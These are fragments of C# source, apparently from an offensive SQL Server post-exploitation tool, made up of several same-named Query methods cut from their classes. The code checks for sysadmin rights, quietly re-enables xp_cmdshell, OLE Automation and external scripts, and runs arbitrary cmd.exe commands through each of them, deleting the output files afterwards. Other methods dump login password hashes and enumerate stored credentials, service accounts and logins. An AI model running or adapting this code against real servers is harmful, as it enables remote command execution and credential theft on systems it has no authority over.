protected bool _CheckPrivilege()
{
if (!SQLSysadminCheck.Query(instance, computerName, credentials))
{
SQLDatabaseRoleMember sDRM = new SQLDatabaseRoleMember(credentials);
sDRM.SetComputerName(computerName);
sDRM.SetInstance(instance);
sDRM.SetDatabase("msdb");
sDRM.Query();
foreach (var row in sDRM.GetResults())
{
#if DEBUG
Console.WriteLine(row.RolePrincipalName);
#endif
if (roles.Contains(row.RolePrincipalName))
{
#if DEBUG
Console.WriteLine(row.PrincipalName + "\t" + Environment.UserDomainName + "\\" + Environment.UserName);
#endif
if (row.PrincipalName.ToString().ToUpper() == Environment.UserDomainName + "\\" + Environment.UserName)
{
return(true);
}
}
}
}
else
{
return(true);
}
return(false);
}
internal void Query(string query)
{
if (!SQLSysadminCheck.Query(instance, computerName, credentials))
{
Console.WriteLine("[-] User is not SysAdmin");
return;
}
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return;
}
int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
if (0 == sao_value)
{
Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
_Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
}
int xcs_value = (int)_Query(sql, @"sp_configure 'Ole Automation Procedures'", "config_value");
if (0 == xcs_value)
{
Console.WriteLine("{0} : Ole Automation Procedures is disabled, enabling.", instance);
_Query(sql, @"sp_configure 'Ole Automation Procedures',1;RECONFIGURE", string.Empty);
}
StringBuilder sb = new StringBuilder();
sb.Append(QUERY1_1);
sb.Append(string.Format("EXEC Sp_oamethod @shell, \'run\' , null, \'cmd.exe /c \"{0} > {1}\"\'", query, fileName));
Console.WriteLine(App.DELIMITER);
Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));
Console.WriteLine(App.DELIMITER);
System.Threading.Thread.Sleep(1000);
sb.Clear();
sb.Append(QUERY2_1);
sb.Append(string.Format("EXEC Sp_oamethod @fso, \'opentextfile\' , @file Out, \'{0}\', 1", fileName));
sb.Append(QUERY2_3);
sb.Append(string.Format("EXEC sp_oamethod @o, \'opentextfile\', @f out, \'{0}\', 1", fileName));
sb.Append(QUERY2_5);
Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
sb.Clear();
sb.Append(QUERY3_1);
sb.Append(string.Format("EXEC Sp_oamethod @Shell, \'run\' , null, \'cmd.exe /c \"del {0}\"\' , \'0\' , \'true\'", fileName));
Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));
if (0 == xcs_value && restoreState)
{
_Query(sql, @"sp_configure 'Ole Automation Procedures',0;RECONFIGURE", string.Empty);
}
if (0 == sao_value && restoreState)
{
_Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
}
}
}
internal void Query(string query)
{
if (!SQLSysadminCheck.Query(instance, computerName, credentials))
{
Console.WriteLine("[-] User is not SysAdmin");
return;
}
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return;
}
int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
if (0 == sao_value)
{
Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
_Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
}
else
{
Console.WriteLine("{0} : Show Advanced Options is enabled.", instance);
}
int xcs_value = (int)_Query(sql, @"sp_configure 'xp_cmdshell'", "config_value");
if (0 == xcs_value)
{
Console.WriteLine("{0} : xp_cmdshell is disabled, enabling.", instance);
_Query(sql, @"sp_configure 'xp_cmdshell',1;RECONFIGURE", string.Empty);
}
else
{
Console.WriteLine("{0} : xp_cmdshell is enabled.", instance);
}
Console.WriteLine(App.DELIMITER);
Console.WriteLine((string)_Query(sql, string.Format("EXEC master..xp_cmdshell \'{0}\'", query), "output"));
Console.WriteLine(App.DELIMITER);
if (0 == xcs_value && restoreState)
{
Console.WriteLine("{0} : Disabling xp_cmdshell.", instance);
_Query(sql, @"sp_configure 'xp_cmdshell',0;RECONFIGURE", string.Empty);
}
if (0 == sao_value && restoreState)
{
Console.WriteLine("{0} : Disabling Show Advanced Options.", instance);
_Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
}
}
}
internal void Query(string query)
{
if (!SQLSysadminCheck.Query(instance, computerName, credentials))
{
Console.WriteLine("[-] User is not SysAdmin");
return;
}
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return;
}
int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
if (0 == sao_value)
{
_Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
}
int xcs_value = (int)_Query(sql, @"sp_configure 'external scripts enabled'", "config_value");
if (0 == xcs_value)
{
_Query(sql, @"sp_configure 'external scripts enabled',1;RECONFIGURE", string.Empty);
}
StringBuilder sb = new StringBuilder();
sb.Append(QUERY1_1);
sb.Append(string.Format("p = subprocess.Popen(\"cmd.exe /c {0}\", stdout=subprocess.PIPE)\n", query));
sb.Append(QUERY1_3);
sb.Append(QUERY1_4);
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
Console.WriteLine(App.DELIMITER);
Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
Console.WriteLine(App.DELIMITER);
if (0 == xcs_value && restoreState)
{
_Query(sql, @"sp_configure 'external scripts enabled',0;RECONFIGURE", string.Empty);
}
if (0 == sao_value && restoreState)
{
_Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
}
}
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
if (!SQLSysadminCheck.Query(instance, computerName, credentials))
{
Console.WriteLine("[-] User is not Sysadmin");
return(false);
}
SQLServerInfo i = new SQLServerInfo(credentials);
i.SetInstance(instance);
i.Query();
SQLServerInfo.Details d = i.GetResults();
int versionShort;
if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
{
Console.WriteLine("[-] Unable to ascertain SQL Version");
Console.WriteLine("[*] It is possible to override this with the --version flag");
return(false);
}
string query = string.Empty;
if (8 < versionShort)
{
query = QUERY1_1;
}
else
{
query = QUERY2_1;
}
//table = sql.Query(query);
hashes = sql.Query <Hash>(query, new Hash());
}
return(false);
}
internal override bool Query()
{
bool isSysAdmin = false;
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
isSysAdmin = SQLSysadminCheck.Query(instance, computerName, credentials);
string query = query1_1;
if (isSysAdmin)
{
query += query1_2;
}
query += string.Format("SELECT \'{0}\' as [ComputerName],\n", computerName);;
query += query1_4;
if (isSysAdmin)
{
query += query1_5;
}
query += query1_6;
table = sql.Query(query);
}
foreach (DataRow row in table.AsEnumerable())
{
try
{
details = new Details
{
ComputerName = (string)row["ComputerName"],
Instance = (string)row["Instance"],
DomainName = (string)row["DomainName"],
ServiceProcessID = (int)row["ServiceProcessID"],
ServiceName = (string)row["ServiceName"],
ServiceAccount = (string)row["ServiceAccount"],
AuthenticationMode = (string)row["AuthenticationMode"],
ForcedEncryption = (int)row["ForcedEncryption"],
Clustered = (string)row["Clustered"],
SQLServerVersionNumber = (string)row["SQLServerVersionNumber"],
SQLServerMajorVersion = (string)row["SQLServerMajorVersion"],
SQLServerEdition = (string)row["SQLServerEdition"],
SQLServerServicePack = (string)row["SQLServerServicePack"],
OSArchitecture = (string)row["OSArchitecture"],
OsVersionNumber = (string)row["OsVersionNumber"],
Currentlogin = (string)row["Currentlogin"]
};
if (isSysAdmin)
{
details.OsMachineType = (string)row["OsMachineType"];
details.OSVersionName = (string)row["OSVersionName"];
}
#if DEBUG
Misc.PrintStruct <Details>(details);
#endif
return(true);
}
catch (Exception ex)
{
if (ex is ArgumentNullException)
{
Console.WriteLine("Empty Response");
}
else
{
Console.WriteLine(ex.Message);
}
return(false);
}
}
return(false);
}
internal override bool Query()
{
bool isSysAdmin = false;
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
isSysAdmin = SQLSysadminCheck.Query(instance, computerName, credentials);
StringBuilder sb = new StringBuilder();
sb.Append(string.Format("USE master;\nSELECT \'{0}\' as [ComputerName],\n\'{1}\' as [Instance],", computerName, instance));
sb.Append(QUERY1_2);
if (!string.IsNullOrEmpty(credentialFilter))
{
sb.Append(credentialFilter);
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
//table = sql.Query(sb.ToString());
serverCredentials = sql.Query <ServerCredential>(sb.ToString(), new ServerCredential());
}
/*
* foreach (DataRow row in table.AsEnumerable())
* {
* try
* {
* ServerCredential sc = new ServerCredential
* {
* ComputerName = (string)row["ComputerName"],
* Instance = (string)row["Instance"],
* credential_id = (int)row["credential_id"],
* CredentialName = (string)row["CredentialName"],
* credential_identity = (string)row["credential_identity"],
* create_date = (DateTime)row["create_date"],
* modify_date = (DateTime)row["modify_date"],
* target_type = (string)row["target_type"],
* target_id = (int)row["target_id"]
* };
#if DEBUG
* Misc.PrintStruct<ServerCredential>(sc);
#endif
* serverCredentials.Add(sc);
* return true;
* }
* catch (Exception ex)
* {
* if (ex is ArgumentNullException)
* Console.WriteLine("Empty Response");
* else
* Console.WriteLine(ex.Message);
* return false;
* }
* }
*/
return(false);
}
internal override bool Query()
{
bool isSysAdmin = false;
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
isSysAdmin = SQLSysadminCheck.Query(instance, computerName, credentials);
StringBuilder sb = new StringBuilder();
sb.Append(QUERY1_1);
if (isSysAdmin)
{
sb.Append(QUERY1_2);
}
sb.Append(QUERY1_3);
if (isSysAdmin)
{
sb.Append(QUERY1_4);
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
//table = sql.Query(sb.ToString());
serverLogins = sql.Query <ServerLogin>(sb.ToString(), new ServerLogin());
}
/*
* foreach (DataRow row in table.AsEnumerable())
* {
* try
* {
* ServerLogin sl = new ServerLogin
* {
* ComputerName = computerName,
* Instance = instance,
* DBEngineLogin = (string)row["DBEngineLogin"],
* AgentLogin = (string)row["AgentLogin"],
* BrowserLogin = (string)row["BrowserLogin"],
* WriterLogin = (string)row["WriterLogin"],
* AnalysisLogin = (object)row["AnalysisLogin"],
* ReportLogin = (object)row["ReportLogin"],
* IntegrationLogin = (object)row["IntegrationLogin"]
* };
#if DEBUG
* Misc.PrintStruct<ServerLogin>(sl);
#endif
* serverLogins.Add(sl);
* return true;
* }
* catch (Exception ex)
* {
* if (ex is ArgumentNullException)
* Console.WriteLine("Empty Response");
* else
* Console.WriteLine(ex.Message);
* return false;
* }
* }
*/
return(true);
}
